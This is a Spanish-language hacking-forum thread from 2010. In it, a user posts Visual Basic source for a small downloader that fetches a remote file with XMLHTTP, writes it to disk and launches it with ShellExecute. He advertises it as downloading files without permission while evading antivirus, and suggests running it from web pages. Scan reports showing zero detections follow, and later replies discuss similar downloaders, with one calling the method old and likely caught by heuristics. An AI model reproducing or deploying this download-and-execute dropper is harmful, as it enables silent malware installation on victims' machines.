* [Source][SIN APIS] Descargar Archivos sin que salten los AV

Iniciado por BlackZeroX, 12 Enero 2010, 04:54 AM

0 Miembros y 1 Visitante están viendo este tema.

BlackZeroX

El código es pequeño pero logra que no salte ningún Antivirus cuando se descarga un archivo sin permiso.

Ademas declarando otro objecto esencial para html se puede explotar directamente en una pagina web... ya que estas también ejecutan vbScript

Código (vb) [Seleccionar]


'
' ////////////////////////////////////////////////////////////////
' // Autor: BlackZeroX ( Ortega Avila Miguel Angel )            //
' //                                                            //
' // Web: http://InfrAngeluX.Sytes.Net/                         //
' //                                                            //
' // |-> Pueden Distribuir Este Código siempre y cuando         //
' // no se eliminen los créditos originales de este código      //
' // No importando que sea modificado/editado o engrandecido    //
' // o achicado, si es en base a este código                    //
' ////////////////////////////////////////////////////////////////
Option Explicit
Function DescargarArchivo(strDowload As String, SaveOn As String) As Long
On Error GoTo 1:
Dim xml                     As Object
Dim adoStream               As Object
   Set xml = CreateObject("Microsoft.XMLHTTP")
   Set adoStream = CreateObject("Adodb.Stream")
   Call xml.Open("GET", strDowload, 0)
   Call xml.Send
   adoStream.Type = 1
   Call adoStream.Open
   Call adoStream.write(xml.responseBody)
   Call adoStream.SaveToFile(SaveOn, 2)
   Call adoStream.Close
   DescargarArchivo = 1
Exit Function
1:
End Function



Código del proyecto con el cual realice en el Scan.

Código (vb) [Seleccionar]


Option Explicit
Sub main()
   If CBool(DescargarArchivo("http://www.goear.com/files/sst2/mp3files/15102006/cfebd49f1b5ba43867cc687896a32ecd.mp3", "c:\aaa.mp3")) Then
       Call vbShell("c:\aaa.mp3", False)
   End If
End Sub
'
' ////////////////////////////////////////////////////////////////
' // Autor: BlackZeroX ( Ortega Avila Miguel Angel )            //
' //                                                            //
' // Web: http://InfrAngeluX.Sytes.Net/                         //
' //                                                            //
' // |-> Pueden Distribuir Este Código siempre y cuando         //
' // no se eliminen los créditos originales de este código      //
' // No importando que sea modificado/editado o engrandecido    //
' // o achicado, si es en base a este código                    //
' ////////////////////////////////////////////////////////////////
Function vbShell(StrPath As String, visible As Long) As Long
Dim ret                     As Object
   Set ret = CreateObject("Shell.Application", "")
   Call ret.ShellExecute(StrPath, "", "", "open", visible)
End Function




lo he probado en un proyecto pequeño miren.

Gracias The Swash por el scan aunq que yo ya lo habia realizado xP

File Info

Report generated: 12.1.2010 at 0.41.15 (GMT 1)
Filename: Project1.exe
File size: 20480 bytes
MD5 hash: d64d53fa4ec3bcafb9ff781303188fb7
SHA1 hash: 62157077EA4D3C17B1988D72F69F8C9502F0026E
Detection rate: 0 on 24
Status: CLEAN

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org



Virus total

Antivirus   Version   Last Update   Result
a-squared   4.5.0.48   2010.01.12   -
AhnLab-V3   5.0.0.2   2010.01.11   -
AntiVir   7.9.1.134   2010.01.11   -
Antiy-AVL   2.0.3.7   2010.01.11   -
Authentium   5.2.0.5   2010.01.12   -
Avast   4.8.1351.0   2010.01.11   -
AVG   9.0.0.725   2010.01.11   -
BitDefender   7.2   2010.01.12   -
CAT-QuickHeal   10.00   2010.01.11   -
ClamAV   0.94.1   2010.01.12   -
Comodo   3550   2010.01.11   -
DrWeb   5.0.1.12222   2010.01.12   -
eSafe   7.0.17.0   2010.01.11   -
eTrust-Vet   35.2.7231   2010.01.12   -
F-Prot   4.5.1.85   2010.01.12   -
F-Secure   9.0.15370.0   2010.01.12   -
Fortinet   4.0.14.0   2010.01.12   -
GData   19   2010.01.12   -
Ikarus   T3.1.1.80.0   2010.01.12   -
Jiangmin   13.0.900   2010.01.11   -
K7AntiVirus   7.10.944   2010.01.11   -
Kaspersky   7.0.0.125   2010.01.12   -
McAfee   5858   2010.01.11   -
McAfee+Artemis   5858   2010.01.11   -
McAfee-GW-Edition   6.8.5   2010.01.12   -
Microsoft   1.5302   2010.01.11   -
NOD32   4762   2010.01.11   -
Norman   6.04.03   2010.01.11   -
nProtect   2009.1.8.0   2010.01.11   -
Panda   10.0.2.2   2010.01.11   -
PCTools   7.0.3.5   2010.01.12   -
Prevx   3.0   2010.01.12   -
Rising   22.30.01.01   2010.01.12   -
Sophos   4.49.0   2010.01.12   -
Sunbelt   3.2.1858.2   2010.01.12   -
Symantec   20091.2.0.41   2010.01.12   -
TheHacker   6.5.0.3.147   2010.01.12   -
TrendMicro   9.120.0.1004   2010.01.11   -
VBA32   3.12.12.1   2010.01.12   -
ViRobot   2010.1.12.2131   2010.01.12   -
VirusBuster   5.0.21.0   2010.01.11   -

Dulces Lunas!¡.
The Dark Shadow is my passion.

AlbertoBSD

Orale esta bien el código y lo interesante es lo que comentas, seria una buena opcion linkear el tema a subforo de malware ya que ahi es donde mas interesa.

Saludos
Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW

Karcrack

http://foro.elhacker.net/programacion_vb/source_downloader_sin_apis_sin_dlls_sin_ocxs_solo_una_funcion-t165233.5.html

Aun asi buen trabajo ;)

fary

Un byte a la izquierda.

BlackZeroX

Cita de: Karcrack en 12 Enero 2010, 07:53 AM
http://foro.elhacker.net/programacion_vb/source_downloader_sin_apis_sin_dlls_sin_ocxs_solo_una_funcion-t165233.5.html

Aun asi buen trabajo ;)

JAJAJA ni lo vi xp solo estaba leyendo algo de javascript y despues me fui a exploits y me dio una idea y el resultado arriba esta xP.

Dulces Lunas!¡.
The Dark Shadow is my passion.

ssccaann43 ©

- Miguel Núñez
Todos tenemos derechos a ser estupidos, pero algunos abusan de ese privilegio...
"I like ^TiFa^"

seba123neo

no hay nada como el AsyncDownload de los usercontrol... :)
La característica extraordinaria de las leyes de la física es que se aplican en todos lados, sea que tú elijas o no creer en ellas. Lo bueno de las ciencias es que siempre tienen la verdad, quieras creerla o no.

Neil deGrasse Tyson

BlackZeroX

Cita de: seba123neo en 13 Enero 2010, 03:09 AM
no hay nada como el AsyncDownload de los usercontrol... :)

Eso si me acuerdo que me entero por lo menos a mi es user Cobein en uno de sus Post... pero hay que ver igual otras posibilidades.!¡

P.D.: O era LeandroA... no recuerdo xd...!¡

Dulces Lunas!¡.
The Dark Shadow is my passion.

Karcrack

Cita de: ░▒▓BlackZeroҖ▓▒░ en 13 Enero 2010, 05:16 AM
Cita de: seba123neo en 13 Enero 2010, 03:09 AM
no hay nada como el AsyncDownload de los usercontrol... :)

Eso si me acuerdo que me entero por lo menos a mi es user Cobein en uno de sus Post... pero hay que ver igual otras posibilidades.!¡

P.D.: O era LeandroA... no recuerdo xd...!¡

Dulces Lunas!¡.
Cobein:
http://foro.elhacker.net/programacion_vb/ucdownload_source-t222454.0.html

Novlucker

#9
Buenas

No quiero ser "duro" con la crítica, pero el método en si no es para nada nuevo, y de hecho, en el foro hay otros tantos códigos iguales a ese (en M$ support desde 2004 o antes).

CitarAdemas declarando otro objecto esencial para html se puede explotar directamente en una pagina web... ya que estas también ejecutan vbScript
Solo IE acepta vbs, aunque el mismo código puede portarse a javascript, y tampoco tan así ... http://foro.elhacker.net/scripting/htmlvbsbatch_propagacion_a_traves_de_internet_posible-t221250.0.html

Por otra parte, alguien lo ha probado con el KIS? porque incrustado en un VBS/HTML es por demás detectado, y en VB debería de ser detectado por heurística.
:http://www.virustotal.com/analisis/697e756e37c60a3f077883ec8da0f21aec6f6f63773facfd4ca7ef0e639de21d-1263471785

Saludos

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein